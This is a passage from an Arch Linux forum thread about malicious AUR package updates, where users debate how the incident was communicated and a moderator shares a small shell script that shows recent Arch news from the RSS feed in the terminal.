multiple malicious AUR updates

5hridhyan · Yesterday 18:14:23

gofree wrote:

Moving to debian, in my opinion this has not been communicated very well.

Just because of the AUR incident(s)? LoL

Last edited by 5hridhyan (Yesterday 18:14:45)

gofree · Yesterday 18:36:45

Yeah, kinda all my servers are now debian and this communication and uncertanity made me move.

5hridhyan wrote:

gofree wrote:
Moving to debian, in my opinion this has not been communicated very well.
Just because of the AUR incident(s)? LoL

seth · Yesterday 18:45:24

in my opinion this has not been communicated very well.

It would probably be more productive to quantify that communication deficit.

Fwwi, https://archlinux.org/news/
You can subscribe to that and I've also (previously posted) a script one could motd.

gofree · Yesterday 18:51:23

Sure I've seen that. Probably like every other guy I tried to find some "next steps - what needs to be done". Where is the list, what to check, etc...preferably on a visible place not hunting down reddit, phoronix, various forums for "semi-official" guides. That's something that could have been done better. Just my 2 cents.

Reboot9012 · Yesterday 20:23:02

Why is there so much outrage the philosophy and scope of this project is well known for a long time just because new people install arch or use arch derivates that doesn't change the goal of this project the end responsibility is with the user.The aur is not an official repo and should be examined when installing things.The arch team can decide if they can take some measures for this incident but I don't understand this finger wagging nobody owes you anything and if you are unhappy you can change distros.

Last edited by Reboot9012 (Yesterday 20:24:58)

gofree · Yesterday 20:27:34

No outrage here. I just think the scope of the impact deserved a wee bit more.

ArchibaldPancakes · Today 03:17:03

So this is essentially garbage but considering that the main issue is steamdeck users, and calling out violation of archlinux philosophy doesn't deter complaint,

I cobbled together a non tested additional aur check topology design in the AI slop phase for a centralized server maintaining problem child repos and client side checking of git aur packages and URLs within pkgbuild as well as common issues.

Maybe as something for someone to fork and deliver on.

https://github.com/willWallace-RIT/Badrepos_git

cfr · Today 05:45:00

gofree wrote:

Sure I've seen that. Probably like every other guy I tried to find some "next steps - what needs to be done". Where is the list, what to check, etc...preferably on a visible place not hunting down reddit, phoronix, various forums for "semi-official" guides. That's something that could have been done better. Just my 2 cents.

But that's the point: AUR is **not** official software. And there is no possible definitive list of checks other than *either* do not use AUR package *or* read the `PKGBUILD`s and ensure you are happy executing them. That list of checks is the **only** one which can give you any guarantees. It has also been the standard list of checks for as long as I have used Arch.

cfr · Today 06:18:36

seth wrote:

Fwwi, https://archlinux.org/news/
You can subscribe to that and I've also (previously posted) a script one could motd.

Is the script in another thread? I thought I checked through this one, but sorry if I missed it.

I was suspicious because I have `npm` installed and no idea why, but I apparently installed it 4 years ago, which is plenty of time for me to forget.

[I always read PKGBUILDs or diffs but I cannot say I understand everything or would never miss anything.]

seth · Today 06:57:05

Probably in the little scripts one or some other time somebody missed some news.

#!/bin/sh
export LC_ALL=C
THIS_MONTH="$(date +'%b %Y')"
LAST_MONTH="$(date +'%b %Y' -d -1month)"
curl -sL 'https://archlinux.org/feeds/news/' | tr '\n' ' ' | \
xmlstarlet sel -T -t -m "//rss/channel/item[contains(string(pubDate), '$LAST_MONTH') or contains(string(pubDate), '$THIS_MONTH')]" \
                        -o $'\n\e[33m' -v pubDate -o $'\n\e[0;1m' -v title -o $'\e[0m' -v description -o $'\n\n────────────────\n' |\
sed $'s/<p>/\\n\\n/g; s/<h.>/\\n\\n\e[1;34m/g; s%</\(h.\|b\|em\|strong\|pre\|code\)>%\e[0m%g;
    s/<li>/\\n· /g;
    s/<\(code\|pre\)>/\e[1;32m/g;
    s/<\(strong\|em\)>/\e[1m/g;
    s/&gt;/>/g; s/&lt;/</g; s/<[^>]*>//g' | fold -sw 100

It just gets the rss feed, filters out the recent months and then turns the html into ansi escape sequences.

Fwwi, I think gofree meant to get some links to the relevant aur-general threads, maybe https://md.archlinux.org/s/SxbqukK6IA and something like https://ioctl.fail/preliminary-analysis-of-aur-malware/
Which is fair, though it would have been necessary to stress that the full extent of the compromise is still unknown and generally void returns from the above by no means prove that your system isn't ridden with malware if you've so far been yolo-ing the AUR.

I cannot say I understand everything or would never miss anything

Understanding that you don't understand most things is the entrance to the path of wisdom. I think I told that some greek dude like 2500 years ago…
The recent attacks have not been very sophisticated, the introduction of npm to those packages is completely nonsensical and would probably have stalled you and the most recent stunt to obfuscate code basically yells "hey look at me, I'm doing something shady"

Arch Linux

#101 Yesterday 18:14:23

Re: multiple malicious AUR updates

#102 Yesterday 18:36:45

Re: multiple malicious AUR updates

#103 Yesterday 18:45:24

Re: multiple malicious AUR updates

#104 Yesterday 18:51:23

Re: multiple malicious AUR updates

#105 Yesterday 20:23:02

Re: multiple malicious AUR updates

#106 Yesterday 20:27:34

Re: multiple malicious AUR updates

#107 Today 03:17:03

Re: multiple malicious AUR updates

#108 Today 05:45:00

Re: multiple malicious AUR updates

#109 Today 06:18:36

Re: multiple malicious AUR updates

#110 Today 06:57:05

Re: multiple malicious AUR updates

Board footer